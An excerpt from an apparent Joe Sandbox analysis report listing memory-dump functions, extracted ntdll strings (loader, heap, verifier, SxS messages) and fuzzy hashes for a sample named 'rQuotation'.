                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01748A3D
                                                                                                                                                                                                                                                • VerifierDlls, xrefs: 01748CBD
                                                                                                                                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01748A67
                                                                                                                                                                                                                                                • HandleTraces, xrefs: 01748C8F
                                                                                                                                                                                                                                                • VerifierDebug, xrefs: 01748CA5
                                                                                                                                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01748B8F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                                                                                                                                • Opcode ID: ec415a70b18518c5ddec519b47b5068ea4d654051604793a1ffc6e9b9c120fdf
                                                                                                                                                                                                                                                • Instruction ID: ab5030dfac747597cc22a0969391bce35cf1c2e1a79780e7da601e894a5e010c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec415a70b18518c5ddec519b47b5068ea4d654051604793a1ffc6e9b9c120fdf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C9105B1A4A31ADFD722DFA88CC0F9AF7E5AB55624F04455CFB416B240C7709D40CB9A
                                                                                                                                                                                                                                                Function 016CEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                                                                                                                                • API String ID: 0-1109411897
                                                                                                                                                                                                                                                • Opcode ID: ef3b456f1f49c0256d89e346ab547a9a47ab22759ceb207e33b14e6359e919fb
                                                                                                                                                                                                                                                • Instruction ID: 2272a28347ec79c70b71c152751bea1d11916fce0da82d1a6f6ca12f7b500b68
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ef3b456f1f49c0256d89e346ab547a9a47ab22759ceb207e33b14e6359e919fb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42A22874A0562A8BDB64DF18CC887A9BBB5EF45704F1442EED90EA7351DB319E82CF40
                                                                                                                                                                                                                                                Function 016BF172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-523794902
                                                                                                                                                                                                                                                • Opcode ID: b59bce6c7a4e63e6ba4b5bedf1b3f43ac24d29da44728c06d8f833228ce5e3e3
                                                                                                                                                                                                                                                • Instruction ID: ccf0cfe69dc390b162b1cc4d8a16c35e4f517acc820faf035eace3a0035f30a1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b59bce6c7a4e63e6ba4b5bedf1b3f43ac24d29da44728c06d8f833228ce5e3e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC42E1716087429FD716DF28CC84BAABBE5FF84604F1489ADE88687352DB34D981CB52
                                                                                                                                                                                                                                                Function 016CADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                                                                                                                                                                                                                                • API String ID: 0-4098886588
                                                                                                                                                                                                                                                • Opcode ID: 8b7b8e0f88044a019266a400fa99ffa08679ff3a5607f1507336f45fa5e7b658
                                                                                                                                                                                                                                                • Instruction ID: 893df3e28be022b2ddf4e40325a3791c2feb33e6b247ac352a3686ae1672256f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b7b8e0f88044a019266a400fa99ffa08679ff3a5607f1507336f45fa5e7b658
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9329071A002698BDB22CB18CC99BBEBBB5FF44780F1441EAD849A7351D7759E828F44
                                                                                                                                                                                                                                                Function 016DB1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                • API String ID: 0-122214566
                                                                                                                                                                                                                                                • Opcode ID: 5015d69852c1542968a51e6df40cf6d3a82b0079c01f608cd5bd8dff1d5c293b
                                                                                                                                                                                                                                                • Instruction ID: 24c0486adfb9095ec4f60cc0f3e6c9f70ca4125e91a55d15f71e85aa3c23b56a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5015d69852c1542968a51e6df40cf6d3a82b0079c01f608cd5bd8dff1d5c293b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FC15931E002169BDF258F68CC81B7EBBA5AF46710F1A816DED02DB389DB70C946D791
                                                                                                                                                                                                                                                Function 016F63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-792281065
                                                                                                                                                                                                                                                • Opcode ID: edb54341a0134fe1cb11bba4a9520d14a3620fc98644f8ed6c2e390a965203c9
                                                                                                                                                                                                                                                • Instruction ID: b891d81e6779e6d9e8e95ecf3762fa0ebcd7166252f79875cdd0fb84e6f8a06a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: edb54341a0134fe1cb11bba4a9520d14a3620fc98644f8ed6c2e390a965203c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD913B71B013159BDB39EF58DCC8BAEBBA1BF91B24F14812CEA0677286D7749841C790
                                                                                                                                                                                                                                                Function 016B645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 01719A01
                                                                                                                                                                                                                                                • apphelp.dll, xrefs: 016B6496
                                                                                                                                                                                                                                                • LdrpInitShimEngine, xrefs: 017199F4, 01719A07, 01719A30
                                                                                                                                                                                                                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01719A2A
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01719A11, 01719A3A
                                                                                                                                                                                                                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 017199ED
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-204845295
                                                                                                                                                                                                                                                • Opcode ID: 5d404c9c9f4146f2446b55fb4578ea77c49439f85dc4e22d753a28a9b82d35a6
                                                                                                                                                                                                                                                • Instruction ID: 130ed251689c62d8deb2ccfdec8bb6198e68495ad7eb818c36291c0e3c1d6d52
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d404c9c9f4146f2446b55fb4578ea77c49439f85dc4e22d753a28a9b82d35a6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6751F3722483049FD720DF28CCA1FABB7E9FB84658F40491DFA8697194D730EA45CB92
                                                                                                                                                                                                                                                Function 016F2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017321BF
                                                                                                                                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01732160, 0173219A, 017321BA
                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01732180
                                                                                                                                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01732178
                                                                                                                                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01732165
                                                                                                                                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0173219F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                                • API String ID: 0-861424205
                                                                                                                                                                                                                                                • Opcode ID: c97805a3ebdd3c1fb74e206f69331065ea8454bbad0d6491b73d92f7a6d74af8
                                                                                                                                                                                                                                                • Instruction ID: e3ef59530add3d76270dae0798270c5a4c27f3dca31014324bae7d4e64dbbeb7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c97805a3ebdd3c1fb74e206f69331065ea8454bbad0d6491b73d92f7a6d74af8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4313536B002257BE7218A9A8C51F6BBB68EBA5A50F05006DFB05A7242D370DE00CAA0
                                                                                                                                                                                                                                                Function 016FC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 016FC6C4
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01738181, 017381F5
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016FC6C3
                                                                                                                                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01738170
                                                                                                                                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017381E5
                                                                                                                                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01738177, 017381EB
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                • API String ID: 0-475462383
                                                                                                                                                                                                                                                • Opcode ID: bf15ac30fbfda1d4b04233e7c11559b46dca3c53d23b6b8293d68d84c6a14521
                                                                                                                                                                                                                                                • Instruction ID: 9cb59283c0dd7f1a94dda7c018dfc523d5d3f66a01d53acfb444c5ec774c50a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bf15ac30fbfda1d4b04233e7c11559b46dca3c53d23b6b8293d68d84c6a14521
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C831E4716483069BC324EB28DC89E2AB7D6EF94B20F04065CF9856B295D730EC04CBA2
                                                                                                                                                                                                                                                Function 016D9950 Relevance: 6.7, Strings: 5, Instructions: 462COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: $ $Internal error check failed$Status != STATUS_SXS_SECTION_NOT_FOUND$minkernel\ntdll\sxsisol.cpp
                                                                                                                                                                                                                                                • API String ID: 0-3393094623
                                                                                                                                                                                                                                                • Opcode ID: c8879ed26fa01f409c79087b6d199a0e447771f276d72d9814d6d0380fe3429f
                                                                                                                                                                                                                                                • Instruction ID: 37700bed1ffdffd7fa39a13e18ddb4334ca4ebc8987897cea7c3bec2382030be
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8879ed26fa01f409c79087b6d199a0e447771f276d72d9814d6d0380fe3429f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95027B719083518FD721CF29C980B6BFBE5BF89708F45891EE9898B350E770D845CB92
                                                                                                                                                                                                                                                Function 0170096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 01702DF0: LdrInitializeThunk.NTDLL ref: 01702DFA
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01700BA3
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01700BB6
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01700D60
                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01700D74
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                                                                                                                                • Opcode ID: 164e732038598e329c9a501b219b834f0aae92fa8797497046d8900c6d26d2cb
                                                                                                                                                                                                                                                • Instruction ID: 7860c8d5a29d9de423ff24d0237292e211bea7b53c55a0f72f7eccd2c05bd092
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 164e732038598e329c9a501b219b834f0aae92fa8797497046d8900c6d26d2cb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20427E71900705DFDB21CF28C884BAAB7F5FF48314F1445A9E989EB286D770AA84CF61
                                                                                                                                                                                                                                                Function 01744F40 Relevance: 6.5, Strings: 5, Instructions: 246COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: .DLL$.Local$/$\$\microsoft.system.package.metadata\Application
                                                                                                                                                                                                                                                • API String ID: 0-2518169356
                                                                                                                                                                                                                                                • Opcode ID: 0941bd4557fca2f4bfb0d0dd563d69a51e13805404c35fdba1460ed5ac351dc4
                                                                                                                                                                                                                                                • Instruction ID: 8f6040e9a24df646d26496b486a08464dd6dd4c21480e20bfbcd2862df1b5a63
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0941bd4557fca2f4bfb0d0dd563d69a51e13805404c35fdba1460ed5ac351dc4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F991BD76D1061ACBCB21CFACC881AAEF7B1EF49310F5941A9E911EB350E735DA01CB91
                                                                                                                                                                                                                                                Function 016D70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                                                                                • API String ID: 0-3178619729
                                                                                                                                                                                                                                                • Opcode ID: 729b86982e7d616562e6b1a97aedaf107d39e1135861c161bdee004c44fc61f9
                                                                                                                                                                                                                                                • Instruction ID: 448779b922b7c74019cf9bd8332366f29cc1e88bddf50d99afeff03a62907007
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 729b86982e7d616562e6b1a97aedaf107d39e1135861c161bdee004c44fc61f9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9613BE70E00256DFDB25CF68C884BA9BBF5FF48304F1881A9D949AB385D734A946CF91
                                                                                                                                                                                                                                                Function 016DA840 Relevance: 5.4, Strings: 4, Instructions: 358COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p, xrefs: 01727D39
                                                                                                                                                                                                                                                • SsHd, xrefs: 016DA885
                                                                                                                                                                                                                                                • SXS: String hash collision chain offset at %p (= %ld) out of bounds, xrefs: 01727D56
                                                                                                                                                                                                                                                • RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section., xrefs: 01727D03
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: RtlpFindUnicodeStringInSection: Unsupported hash algorithm %lu found in string section.$SXS: String hash collision chain offset at %p (= %ld) out of bounds$SXS: String hash table entry at %p has invalid key offset (= %ld) Header = %p; Index = %lu; Bucket = %p; Chain = %p$SsHd
                                                                                                                                                                                                                                                • API String ID: 0-2905229100
                                                                                                                                                                                                                                                • Opcode ID: a4218c5e82c1c043d76a3a193543e0cb69d1c3f3d08eeca7980caedf2c76899f
                                                                                                                                                                                                                                                • Instruction ID: e7f32fa42a51e0596d93069d6f998819e249b66275851a09ed6f6849c4f0afa1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4218c5e82c1c043d76a3a193543e0cb69d1c3f3d08eeca7980caedf2c76899f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 07D1AF36E04219DFDB25CFA8C9C0AADFBB5FF58310F19416AE905AB345D3719882CB91
                                                                                                                                                                                                                                                Function 016CA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                                • API String ID: 0-379654539
                                                                                                                                                                                                                                                • Opcode ID: c4595062700dece9e1c08852ce33665ca97db200d9b49ef84505a9c5b2bf58d7
                                                                                                                                                                                                                                                • Instruction ID: a4dbf38b45a3b90a52729c8f82dff3c3d4331533e49c5dfb340684afa089a74a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4595062700dece9e1c08852ce33665ca97db200d9b49ef84505a9c5b2bf58d7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74C1897410838A8FD711DF98C844B7AB7E4FF94B04F04896EF9968B251E734C94ACB96
                                                                                                                                                                                                                                                Function 016F8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • LdrpInitializeProcess, xrefs: 016F8422
                                                                                                                                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 016F8421
                                                                                                                                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 016F855E
                                                                                                                                                                                                                                                • @, xrefs: 016F8591
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                                                                                                                                • Opcode ID: f1849960af62455408ef6c5117407ac9dc92dfac0ce2da5c805dc19a73500cd2
                                                                                                                                                                                                                                                • Instruction ID: 1a002134337a2dee264a888375ff803b9bfe855b09d1ef7aca85b5b84ebdc86c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1849960af62455408ef6c5117407ac9dc92dfac0ce2da5c805dc19a73500cd2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0F917D72508345AFDB22EF25CC48FABBAECBF84654F40096EFA8493151E334D904CB66
                                                                                                                                                                                                                                                Function 016D0C00 Relevance: 5.3, Strings: 4, Instructions: 260COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • HEAP: , xrefs: 017254E0, 017255A1
                                                                                                                                                                                                                                                • ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock, xrefs: 017255AE
                                                                                                                                                                                                                                                • ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock)), xrefs: 017254ED
                                                                                                                                                                                                                                                • HEAP[%wZ]: , xrefs: 017254D1, 01725592
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2022344447.0000000001690000.00000040.00001000.00020000.00000000.sdmp, Offset: 01690000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1690000_rQuotation.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))$HEAP: $HEAP[%wZ]: $ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock
                                                                                                                                                                                                                                                • API String ID: 0-1657114761
                                                                                                                                                                                                                                                • Opcode ID: 8396aa156895a00d488a782503aa7b8d18c6780a22aa68b7829ac1fea89ae9d8
                                                                                                                                                                                                                                                • Instruction ID: 5ed836f08220c468e81675ad3cb2f827da098965e79637d97b0834a4f7605ff8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8396aa156895a00d488a782503aa7b8d18c6780a22aa68b7829ac1fea89ae9d8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ACA1E030A0034A9FD725DF29CC80BBAFBE2EF45300F14816EE48A8B782D730A845C791
                                                                                                                                                                                                                                                Function 016F273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017321D9, 017322B1
                                                                                                                                                                                                                                                • .Local, xrefs: 016F28D8
